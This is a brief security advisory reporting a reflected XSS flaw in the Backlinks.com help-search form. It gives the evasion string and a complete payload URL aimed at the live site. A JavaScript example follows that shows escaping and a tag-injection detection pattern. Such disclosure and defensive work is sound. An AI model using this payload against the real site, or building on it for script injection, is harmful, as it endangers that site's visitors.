Backlinks.com XSS Vulnerability

XSS13290

Overview

The help document search form on Backlinks.com does not correctly sanitise user input, allowing an XSS attack to be executed.

The following symbols are converted to their URL encoded counterparts: <, >, /
Evasion string used (before encoding): /><script>alert(/XSS/)</script>


http://www.backlinks.com/kb/index.php/search?search=1&searchtext=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
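As an added illustration (not code from the advisory or from Backlinks.com), the script below takes the request URL quoted above, decodes the searchtext parameter, and contrasts echoing it raw into the search box with context-aware HTML escaping. The input template shape is an assumption about what a knowledge-base search page looks like; the point it demonstrates is that encoding a deny-list of a few characters (<, >, /) misses the double quote that closes the value attribute, whereas entity-encoding every HTML metacharacter for the attribute context renders the advisory's own payload inert.

```javascript
// Added example, not the advisory's or Backlinks.com's code.
// Assumes a PHP-style template that echoes the search text into
// the input's value attribute.

// The request URL quoted in the advisory.
const ADVISORY_URL =
  "http://www.backlinks.com/kb/index.php/search?search=1" +
  "&searchtext=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E";

// Extract and percent-decode one query parameter (WHATWG URL API).
function getParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Escape for HTML text and double-quoted attribute contexts. An allow-list
// of metacharacters mapped to entities, instead of the deny-list of
// <, > and / the advisory describes, which leaves the quote untouched.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the parameter is reflected without escaping.
function renderUnsafe(searchtext) {
  return '<input type="text" name="searchtext" value="' + searchtext + '">';
}

// Hardened rendering: the same template with contextual output encoding.
function renderSafe(searchtext) {
  return '<input type="text" name="searchtext" value="' + escapeHtml(searchtext) + '">';
}

// Structural check used to compare the two renderings: a single <input>
// must yield exactly one tag; any extra tag means the attribute was
// broken out of and new markup was injected.
function countTags(html) {
  return (html.match(/<[a-zA-Z\/][^>]*>/g) || []).length;
}

// Detection side, for an access-log or WAF rule on the decoded parameter:
// a quote followed by a tag opener, or a script tag, indicates tag injection.
function looksLikeTagInjection(paramValue) {
  return /["']\s*>?\s*<\s*\/?[a-zA-Z]/.test(paramValue) || /<\s*script/i.test(paramValue);
}

// Stand-alone demonstration.
const payload = getParam(ADVISORY_URL, "searchtext");
console.log("decoded parameter :", payload);
console.log("tags in unsafe render:", countTags(renderUnsafe(payload)));
console.log("tags in safe render  :", countTags(renderSafe(payload)));
console.log("flagged by detector  :", looksLikeTagInjection(payload));
```

The escaping function is applied at output time, in the HTML attribute context, rather than at input time; the same search text stored or logged elsewhere would need the encoder appropriate to that context.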
